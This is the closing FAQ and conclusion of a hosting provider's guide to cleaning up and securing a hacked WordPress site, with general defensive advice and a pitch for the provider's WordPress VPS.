For higher-risk sites or production workloads, a VPS environment like Contabo’s WordPress VPS can provide stronger isolation than shared hosting and more control for server-level hardening such as SSH key authentication, firewall rules, and tools like fail2ban. Combined with WordPress security plugins, this gives you practical defense in depth.
WordPress Hacked FAQ
What to do if my WordPress site was hacked?
Enable maintenance mode to reduce user exposure, then change all passwords (WordPress admin, hosting control panel, SFTP/SSH, database, and any email accounts tied to resets). Run a malware scan, restore from a known-clean backup if you have one, or follow the cleanup steps in this guide: replace WordPress core files, remove compromised plugins/themes, and clean the database.
How to tell if your WordPress site has been hacked?
Common signs include browser or Google Safe Browsing warnings, unexpected redirects, new admin users you didn’t create, suspicious .php files in wp-content/uploads/, or injected spam content. Use an external scanner for a quick check, then run a security plugin scan for deeper file and integrity analysis.
Why does my WordPress site keep getting hacked?
Reinfection usually means the original entry point wasn’t fixed. Common causes include hidden backdoors, outdated plugins/themes, compromised credentials, or a compromised hosting account. Reinstall files from clean sources, remove unfamiliar code in wp-content, rotate all credentials, and enable 2FA on critical accounts.
What is the best WordPress security plugin?
There isn’t a single best option for every site. Wordfence is a strong all-in-one plugin with a good free tier, but it can be resource-intensive and the free version has delayed threat intelligence updates. Cloud-based options like Sucuri’s WAF can block attacks before they hit WordPress and are often a better fit for high-value or high-traffic sites. Tools like MalCare are popular for automated scanning and cleanup workflows, especially for non-technical site owners. Choose based on your risk level, traffic volume, and whether you want a plugin-based or cloud-based approach.
Conclusion
A hacked WordPress site can seem overwhelming, but if you follow these steps, you can get it back to normal: find the infection, limit the damage, replace the files that were compromised, clean the database, and then make your setup more secure. The sooner you act, the less likely it is that abuse, data exposure, and SEO damage will continue.
You can safely bring your site back online by following the steps in this guide: maintenance mode, resetting passwords, replacing core files, cleaning up the database, and making security stronger. Cleaning up is not the end of security. Keep WordPress, plugins, and themes up to date. Use strong passwords with two-factor authentication (2FA), run regular scans, and keep backups that have been tested.
Finally, having the right hosting setup helps. An isolated environment with its own resources and stricter access controls makes common attacks less damaging and gives you more ways to harden your server. A WordPress VPS gives you root access, resource isolation, and the ability to customize your server-level protections in ways that shared hosting can’t. When used with good WordPress hygiene, it makes a practical defense in depth and lowers the chance of getting hacked again.